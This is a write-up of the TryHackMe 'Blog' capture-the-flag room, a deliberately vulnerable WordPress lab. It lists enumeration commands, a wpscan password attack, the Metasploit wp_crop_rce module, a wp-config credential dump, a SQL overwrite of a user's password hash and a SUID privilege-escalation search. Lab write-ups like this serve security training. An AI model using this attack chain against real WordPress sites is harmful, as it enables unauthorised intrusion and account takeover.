Complete TryHackMe Blog Room Walktrough

Billy Joel made a WordPress blog! Can you hack it?

TryHackMe Blog Room Walktrough Billy Joel made a blog on his home computer and has started working on it.  It’s going to be so awesome!

Billy Joel WordPress Blog!

TryHackMe Blog Room
TryHackMe Blog Room

TryHackMe Blog Room Link: https://tryhackme.com/room/blog

Enumerate this box and find the 2 flags that are hiding on it!  Billy has some weird things going on his laptop.  Can you maneuver around and get what you need?  Or will you fall down the rabbit hole…

In order to get the blog to work with AWS, you’ll need to add blog.thm to your /etc/hosts file.

Credit to Sq00ky for the root privesc idea 😉

TryHackMe Blog Room Walktrough

On this Lab we need to attack a WordPress blog and extract two flags and answer three questions about the system.

First I will scan the server using Nmap in order to find open ports and what services are running on each port, since we know that we are attacking a WordPress blog let’s execute gobuster to find some hidden folders.

Learning Topics:

Prepare Host Access

In order to test this machine effectively is necessary to add the host IP into our hosts file.

┌──(kali㉿B0untyB0x)-[~/Desktop/THM_WP_Blog]
└─$ vi /etc/hosts
<IP>   blog.thm
Complete TryHackMe Blog Room Walktrough

Enumerate Host

Verify open ports and Services with Nmap

┌──(kali㉿B0untyB0x)-[~/Desktop/THM_WP_Blog]
└─$ nmap 10.10.238.30

Enumerate Samba

┌──(kali㉿B0untyB0x)-[~/Desktop/THM_WP_Blog]
└─$ smbmap -H 10.10.238.30
Complete TryHackMe Blog Room Walktrough

Connect to Samba

┌──(kali㉿B0untyB0x)-[~/Desktop/THM_WP_Blog]
└─$ smbclient //10.10.238.30/BillySMB
Complete TryHackMe Blog Room Walktrough

Download files

Complete TryHackMe Blog Room Walktrough
┌──(kali㉿B0untyB0x)-[~/Desktop/THM_WP_Blog]
└─$ steghide extract -sf Alice-White-Rabbit.jpg
Complete TryHackMe Blog Room Walktrough
┌──(kali㉿B0untyB0x)-[~/Desktop/THM_WP_Blog]
└─$ cat rabbit_hole.txt
Complete TryHackMe Blog Room Walktrough
┌──(kali㉿B0untyB0x)-[~/Desktop/THM_WP_Blog]
└─$ exiftool tswift.mp4
Complete TryHackMe Blog Room Walktrough
┌──(kali㉿B0untyB0x)-[~/Desktop/THM_WP_Blog]
└─$ exiftool Alice-White-Rabbit.jpg
Complete TryHackMe Blog Room Walktrough

Enumerate WordPress Blog

┌──(kali㉿B0untyB0x)-[~/Desktop/THM_WP_Blog]
└─$ wpscan --url http://10.10.238.30/ --passwords passwords.txt
Complete TryHackMe Blog Room Walktrough
Complete TryHackMe Blog Room Walktrough
Complete TryHackMe Blog Room Walktrough
Complete TryHackMe Blog Room Walktrough
┌──(kali㉿B0untyB0x)-[~/Desktop/THM_WP_Blog]
└─$ use exploit/multi/http/wp_crop_rce
Complete TryHackMe Blog Room Walktrough

Privilege Escation

Read more about: Linux Privilege Escalation

┌──(kali㉿B0untyB0x)-[~/Desktop/THM_WP_Blog]
└─$ python -c 'import pty; pty.spawn("/bin/bash")'
export SHELL=bash
export TERM=xterm256-color
stty rows 38 columns 116
┌──(kali㉿B0untyB0x)-[~/Desktop/THM_WP_Blog]
└─$ cat wp-config.php
define('DB_NAME', 'blog');

/** MySQL database username */
define('DB_USER', 'wordpressuser');

/** MySQL database password */
define('DB_PASSWORD', 'LittleYellow--RFS');
┌──(kali㉿B0untyB0x)-[~/Desktop/THM_WP_Blog]
└─$ mysql -u wordpressuser -h localhost -p
Complete TryHackMe Blog Room Walktrough
Complete TryHackMe Blog Room Walktrough
Complete TryHackMe Blog Room Walktrough
Complete TryHackMe Blog Room Walktrough
wp-users table
UPDATE wp_users 
SET 
    user_pass = '$P$BedNwvQ29vr1TPd80CDl6WnHy--RFS'
WHERE
    user_nicename = "bjoel";
find / -perm -u=s -type f 2>/dev/null
[email protected]:/var/www/wordpress$ /usr/sbin/checker
Complete TryHackMe Blog Room Walktrough
Complete TryHackMe Blog Room Walktrough

Related Posts

Index